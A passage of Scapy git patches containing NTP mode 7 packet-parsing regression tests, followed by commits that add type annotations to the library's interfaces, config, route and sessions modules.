(1) - request +s = b'\x17\x00\x03*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 42) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) + + += NTP Private (mode 7) - REQ_MON_GETLIST_1 (2) - response +s = b'\xd7\x00\x03*\x00\x06\x00H\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\x94mw\xe9\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\x13\xb6\xa9J\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xbb]\x81\xea\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xfc\xbf\xd5a\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xbe\x10x\xa8\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xde[ng\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.request_code == 42) +assert(p.nb_items == 6) +assert(p.data_item_size == 72) + + += NTP Private (mode 7) - REQ_IF_STATS (1) - request +s = b'\x17\x80\x03,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xeb\xdd\x8cH\xefe\x00\x00\x00\x01\x8b\xfb\x90u\xa8ad\xe8\x87\xca\xbf\x96\xd2\x9d\xddI' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 1) +assert(p.request_code == 44) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'8bfb9075a86164e887cabf96d29ddd49') + + += NTP Private (mode 7) - REQ_IF_STATS (2) - response +s = b"\xd7\x00\x03,\x00\x03\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x01lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\n\x00'\xff\xfe\xe3\x81r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\n\x00'\xff\xfe\xa0\x1d\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00" +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 44) +assert(p.err == 0) +assert(p.nb_items == 3) +assert(p.data_item_size == 136) +assert(isinstance(p.data[0], NTPInfoIfStatsIPv6)) +assert(p.data[0].unaddr == "::1") +assert(p.data[0].unmask == "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff") +assert(p.data[0].ifname.startswith(b"lo")) + + += NTP Private (mode 7) - REQ_IF_STATS (3) - response +s = b'\xd7\x01\x03,\x00\x03\x00\x88\xc0\xa8ze\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8z\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x00\n\x00\x02\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 44) +assert(p.err == 0) +assert(p.nb_items == 3) +assert(p.data_item_size == 136) +assert(isinstance(p.data[0], NTPInfoIfStatsIPv4)) +assert(p.data[0].unaddr == "192.168.122.101") +assert(p.data[0].unmask == "255.255.255.0") +assert(p.data[0].ifname.startswith(b"eth1")) + + += NTP Private (mode 7) - REQ_IF_RELOAD (1) - request +s = b'\x17\x80\x03-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xed\xa3\xdc\x7f\xc6\x11\x00\x00\x00\x01\xfb>\x96*\xe7O\xf7\x8feh\xd4\x07L\xc0\x08\xcb' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 0) +assert(p.more == 0) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 1) +assert(p.request_code == 45) +assert(p.nb_items == 0) +assert(p.data_item_size == 0) +assert(hasattr(p, 'authenticator')) +assert(p.authenticator.key_id == 1) +assert(bytes_hex(p.authenticator.dgst) == b'fb3e962ae74ff78f6568d4074cc008cb') + + += NTP Private (mode 7) - REQ_IF_RELOAD (2) - response +s = b'\xd7\x00\x03-\x00\x03\x00\x88\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\n\x00\x02\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x02\x00\x01\x00\x00\x00\x00\xc0\xa8ze\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8z\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\t\x00\x02\x00\x01\x00\x00\x00\x00' +p = NTP(s) +assert(isinstance(p, NTPPrivate)) +assert(p.response == 1) +assert(p.more == 1) +assert(p.version == 2) +assert(p.mode == 7) +assert(p.auth == 0) +assert(p.request_code == 45) +assert(p.err == 0) +assert(p.nb_items == 3) +assert(p.data_item_size == 136) +assert(isinstance(p.data[0], NTPInfoIfStatsIPv4)) +assert(p.data[0].unaddr == "127.0.0.1") +assert(p.data[0].unmask == "255.0.0.0") +assert(p.data[0].ifname.startswith(b"lo")) From b9965a082f755cd53ebec36db08eb6a27744027e Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 24 Oct 2020 20:06:49 +0200 Subject: [PATCH 0366/1632] Core typing: interfaces.py --- .config/mypy/mypy_enabled.txt | 1 + scapy/config.py | 16 +++--- scapy/interfaces.py | 105 +++++++++++++++++++++++++++------- scapy/route.py | 3 +- scapy/route6.py | 3 +- test/regression.uts | 5 +- 6 files changed, 97 insertions(+), 36 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 0e0d12799d0..d41b9a2b16d 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -15,6 +15,7 @@ scapy/data.py scapy/error.py scapy/extlib.py scapy/fields.py +scapy/interfaces.py scapy/main.py scapy/packet.py scapy/plist.py diff --git a/scapy/config.py b/scapy/config.py index a59a4e784a5..0f10f4efd66 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -664,7 +664,7 @@ def _loglevel_changer(attr, val, old): def _iface_changer(attr, val, old): - # type: (str, Any, Any) -> 'scapy.interfaces.NetworkInterfaceDict' + # type: (str, Any, Any) -> 'scapy.interfaces.NetworkInterface' """Resolves the interface in conf.iface""" if isinstance(val, str): from scapy.interfaces import resolve_iface @@ -675,7 +675,7 @@ def _iface_changer(attr, val, old): "See conf.ifaces output" ) return iface - return val + return val # type: ignore class Conf(ConfClass): @@ -725,12 +725,12 @@ class Conf(ConfClass): default_l2 = None # type: Type[Packet] l2types = Num2Layer() l3types = Num2Layer() - L3socket = None - L3socket6 = None - L2socket = None - L2listen = None - BTsocket = None - USBsocket = None + L3socket = None # type: Type[scapy.supersocket.SuperSocket] + L3socket6 = None # type: Type[scapy.supersocket.SuperSocket] + L2socket = None # type: Type[scapy.supersocket.SuperSocket] + L2listen = None # type: Type[scapy.supersocket.SuperSocket] + BTsocket = None # type: Type[scapy.supersocket.SuperSocket] + USBsocket = None # type: Type[scapy.supersocket.SuperSocket] min_pkt_size = 60 #: holds MIB direct access dictionary mib = None # type: 'scapy.asn1.mib.MIBDict' diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 829e0799277..096cc61ae6a 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -20,6 +20,20 @@ from scapy.modules.six.moves import UserDict import scapy.modules.six as six +# Typing imports +import scapy +from scapy.compat import ( + Any, + DefaultDict, + Dict, + List, + NoReturn, + Optional, + Tuple, + Type, + Union, +) + class InterfaceProvider(object): name = "Unknown" @@ -28,31 +42,41 @@ class InterfaceProvider(object): libpcap = False def load(self): + # type: () -> NoReturn """Returns a dictionary of the loaded interfaces, by their name.""" raise NotImplementedError def reload(self): + # type: () -> Dict[str, NetworkInterface] """Same than load() but for reloads. By default calls load""" return self.load() def l2socket(self): + # type: () -> Type[scapy.supersocket.SuperSocket] """Return L2 socket used by interfaces of this provider""" return conf.L2socket def l2listen(self): + # type: () -> Type[scapy.supersocket.SuperSocket] """Return L2listen socket used by interfaces of this provider""" return conf.L2listen def l3socket(self): + # type: () -> Type[scapy.supersocket.SuperSocket] """Return L3 socket used by interfaces of this provider""" return conf.L3socket def _is_valid(self, dev): + # type: (NetworkInterface) -> bool """Returns whether an interface is valid or not""" return bool((dev.ips[4] or dev.ips[6]) and dev.mac) - def _format(self, dev, **kwargs): + def _format(self, + dev, # type: NetworkInterface + **kwargs # type: Any + ): + # type: (...) -> Tuple[str, str, str, List[str], List[str]] """Returns the elements used by show() If a tuple is returned, this consist of the strings that will be @@ -62,27 +86,32 @@ def _format(self, dev, **kwargs): """ mac = dev.mac resolve_mac = kwargs.get("resolve_mac", True) - if resolve_mac and conf.manufdb: + if resolve_mac and conf.manufdb and mac: mac = conf.manufdb._resolve_MAC(mac) index = str(dev.index) - return (index, dev.description, mac, dev.ips[4], dev.ips[6]) + return (index, dev.description, mac or "", dev.ips[4], dev.ips[6]) class NetworkInterface(object): - def __init__(self, provider, data=None): + def __init__(self, + provider, # type: InterfaceProvider + data=None, # type: Optional[Dict[str, Any]] + ): + # type: (...) -> None self.provider = provider self.name = "" self.description = "" self.network_name = "" self.index = -1 - self.ip = None - self.ips = defaultdict(list) - self.mac = None + self.ip = None # type: Optional[str] + self.ips = defaultdict(list) # type: DefaultDict[int, List[str]] + self.mac = None # type: Optional[str] self.dummy = False if data is not None: self.update(data) def update(self, data): + # type: (Dict[str, Any]) -> None """Update info about a network interface according to a given dictionary. Such data is provided by providers """ @@ -107,6 +136,7 @@ def update(self, data): self.ip = self.ips[4][0] def __eq__(self, other): + # type: (Any) -> bool if isinstance(other, str): return other in [self.name, self.network_name, self.description] if isinstance(other, NetworkInterface): @@ -114,37 +144,47 @@ def __eq__(self, other): return False def __ne__(self, other): + # type: (Any) -> bool return not self.__eq__(other) def __hash__(self): + # type: () -> int return hash(self.network_name) def is_valid(self): + # type: () -> bool if self.dummy: return False return self.provider._is_valid(self) def l2socket(self): + # type: () -> Type[scapy.supersocket.SuperSocket] return self.provider.l2socket() def l2listen(self): + # type: () -> Type[scapy.supersocket.SuperSocket] return self.provider.l2listen() def l3socket(self): + # type: () -> Type[scapy.supersocket.SuperSocket] return self.provider.l3socket() def __repr__(self): + # type: () -> str return "<%s %s [%s]>" % (self.__class__.__name__, self.description, self.dummy and "dummy" or (self.flags or "")) def __str__(self): + # type: () -> str return self.network_name def __add__(self, other): + # type: (str) -> str return self.network_name + other def __radd__(self, other): + # type: (str) -> str return other + self.network_name @@ -152,10 +192,15 @@ class NetworkInterfaceDict(UserDict): """Store information about network interfaces and convert between names""" def __init__(self): - self.providers = {} + # type: () -> None + self.providers = {} # type: Dict[Type[InterfaceProvider], InterfaceProvider] # noqa: E501 UserDict.__init__(self) - def _load(self, dat, prov): + def _load(self, + dat, # type: Dict[str, NetworkInterface] + prov, # type: InterfaceProvider + ): + # type: (...) -> None for ifname, iface in six.iteritems(dat): if ifname in self.data: # Handle priorities: keep except if libpcap @@ -165,10 +210,12 @@ def _load(self, dat, prov): self.data[ifname] = iface def register_provider(self, provider): + # type: (type) -> None prov = provider() self.providers[provider] = prov def load_confiface(self): + # type: () -> None """ Reload conf.iface """ @@ -178,29 +225,33 @@ def load_confiface(self): conf.iface = get_working_if() def _reload_provs(self): + # type: () -> None self.clear() for prov in self.providers.values(): self._load(prov.reload(), prov) def reload(self): + # type: () -> None self._reload_provs() if conf.route: self.load_confiface() def dev_from_name(self, name): + # type: (str) -> NetworkInterface """Return the first network device name for a given device name. """ try: - return next(iface for iface in six.itervalues(self) + return next(iface for iface in six.itervalues(self) # type: ignore if (iface.name == name or iface.description == name)) except (StopIteration, RuntimeError): raise ValueError("Unknown network interface %r" % name) def dev_from_networkname(self, network_name): + # type: (str) -> NoReturn """Return interface for a given network device name.""" try: - return next(iface for iface in six.itervalues(self) + return next(iface for iface in six.itervalues(self) # type: ignore if iface.network_name == network_name) except (StopIteration, RuntimeError): raise ValueError( @@ -208,10 +259,11 @@ def dev_from_networkname(self, network_name): network_name) def dev_from_index(self, if_index): + # type: (int) -> NetworkInterface """Return interface name from interface index""" try: if_index = int(if_index) # Backward compatibility - return next(iface for iface in six.itervalues(self) + return next(iface for iface in six.itervalues(self) # type: ignore if iface.index == if_index) except (StopIteration, RuntimeError): if str(if_index) == "1": @@ -220,6 +272,7 @@ def dev_from_index(self, if_index): raise ValueError("Unknown network interface index %r" % if_index) def _add_fake_iface(self, ifname): + # type: (str) -> None """Internal function used for a testing purpose""" data = { 'name': ifname, @@ -250,6 +303,7 @@ class FakeProv(WindowsInterfacesProvider): self.data[ifname] = NetworkInterface(InterfaceProvider(), data) def show(self, print_result=True, hidden=False, **kwargs): + # type: (bool, bool, **Any) -> Optional[str] """ Print list of available network interfaces in human readable form @@ -275,22 +329,26 @@ def show(self, print_result=True, hidden=False, **kwargs): output = output[:-1] if print_result: print(output) + return None else: return output def __repr__(self): - return self.show(print_result=False) + # type: () -> str + return self.show(print_result=False) # type: ignore conf.ifaces = IFACES = ifaces = NetworkInterfaceDict() def get_if_list(): + # type: () -> List[str] """Return a list of interface names""" return list(conf.ifaces.keys()) def get_working_if(): + # type: () -> NetworkInterface """Return an interface that works""" # return the interface associated with the route with smallest # mask (route by default if it exists) @@ -299,30 +357,34 @@ def get_working_if(): ifaces = (x[3] for x in routes) # First check the routing ifaces from best to worse, # then check all the available ifaces as backup. - for iface in itertools.chain(ifaces, conf.ifaces.values()): - iface = resolve_iface(iface) - if iface and iface.is_valid(): + for ifname in itertools.chain(ifaces, conf.ifaces.values()): + iface = resolve_iface(ifname) + if iface.is_valid(): return iface # There is no hope left - return conf.loopback_name + return resolve_iface(conf.loopback_name) def get_working_ifaces(): + # type: () -> List[NetworkInterface] """Return all interfaces that work""" return [iface for iface in conf.ifaces.values() if iface.is_valid()] def dev_from_networkname(network_name): + # type: (str) -> NetworkInterface """Return Scapy device name for given network device name""" return conf.ifaces.dev_from_networkname(network_name) def dev_from_index(if_index): + # type: (int) -> NetworkInterface """Return interface for a given interface index""" return conf.ifaces.dev_from_index(if_index) def resolve_iface(dev): + # type: (Union[NetworkInterface, str]) -> NetworkInterface """ Resolve an interface name into the interface """ @@ -348,15 +410,14 @@ def resolve_iface(dev): def network_name(dev): + # type: (Union[NetworkInterface, str]) -> str """ Resolves the device network name of a device or Scapy NetworkInterface """ - iface = resolve_iface(dev) - if iface: - return iface.network_name - return dev + return resolve_iface(dev).network_name def show_interfaces(resolve_mac=True): + # type: (bool) -> None """Print list of available network interfaces""" - return conf.ifaces.show(resolve_mac) + return conf.ifaces.show(resolve_mac) # type: ignore diff --git a/scapy/route.py b/scapy/route.py index 3cdbf540de6..56724b219bb 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -23,7 +23,6 @@ Optional, Tuple, Union, - cast, ) @@ -51,7 +50,7 @@ def __repr__(self): # type: () -> str rtlst = [] # type: List[Tuple[Union[str, List[str]], ...]] for net, msk, gw, iface, addr, metric in self.routes: - if_repr = cast(str, resolve_iface(iface).description) + if_repr = resolve_iface(iface).description rtlst.append((ltoa(net), ltoa(msk), gw, diff --git a/scapy/route6.py b/scapy/route6.py index 93a3dc02e0d..4e1aab928aa 100644 --- a/scapy/route6.py +++ b/scapy/route6.py @@ -35,7 +35,6 @@ Set, Tuple, Union, - cast, ) @@ -73,7 +72,7 @@ def __repr__(self): rtlst = [] # type: List[Tuple[Union[str, List[str]], ...]] for net, msk, gw, iface, cset, metric in self.routes: - if_repr = cast(str, resolve_iface(iface).description) + if_repr = resolve_iface(iface).description rtlst.append(('%s/%i' % (net, msk), gw, if_repr, diff --git a/test/regression.uts b/test/regression.uts index 41245a30010..dab00da9079 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -208,8 +208,9 @@ assert conf.iface.is_valid() import mock @mock.patch("scapy.interfaces.conf.route.routes", []) -@mock.patch("scapy.interfaces.conf.ifaces", {}) -def _test_get_working_if(): +@mock.patch("scapy.interfaces.conf.ifaces.values") +def _test_get_working_if(rou): + rou.side_effect = lambda: [] assert get_working_if() == conf.loopback_name assert conf.iface + "a" # left + From 9f57a6872b2e3c777967b0e63f7b1da172fdc637 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 25 Oct 2020 11:41:30 +0100 Subject: [PATCH 0367/1632] Core typing: scapy/sessions.py --- .config/mypy/mypy_enabled.txt | 1 + scapy/sessions.py | 86 ++++++++++++++++++++++++++++------- 2 files changed, 70 insertions(+), 17 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index d41b9a2b16d..207453a5e1f 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -22,6 +22,7 @@ scapy/plist.py scapy/pton_ntop.py scapy/route.py scapy/route6.py +scapy/sessions.py scapy/utils.py # LAYERS diff --git a/scapy/sessions.py b/scapy/sessions.py index a2a823e83bb..2a9cc1457aa 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -10,18 +10,37 @@ from collections import defaultdict from scapy.compat import raw from scapy.config import conf -from scapy.packet import NoPayload +from scapy.packet import NoPayload, Packet from scapy.plist import PacketList +# Typing imports +from scapy.compat import ( + Any, + Callable, + DefaultDict, + Dict, + List, + Optional, + Tuple, + cast +) + class DefaultSession(object): """Default session: no stream decoding""" - def __init__(self, prn=None, store=False, supersession=None, - *args, **karg): + def __init__( + self, + prn=None, # type: Optional[Callable[[Packet], Any]] + store=False, # type: bool + supersession=None, # type: Optional[DefaultSession] + *args, # type: Any + **karg # type: Any + ): + # type: (...) -> None self.__prn = prn self.__store = store - self.lst = [] + self.lst = [] # type: List[Packet] self.__count = 0 self._supersession = supersession if self._supersession: @@ -32,10 +51,12 @@ def __init__(self, prn=None, store=False, supersession=None, @property def store(self): + # type: () -> bool return self.__store @store.setter def store(self, val): + # type: (bool) -> None if self._supersession: self._supersession.store = val else: @@ -43,10 +64,12 @@ def store(self, val): @property def prn(self): + # type: () -> Optional[Callable[[Packet], Any]] return self.__prn @prn.setter def prn(self, f): + # type: (Optional[Any]) -> None if 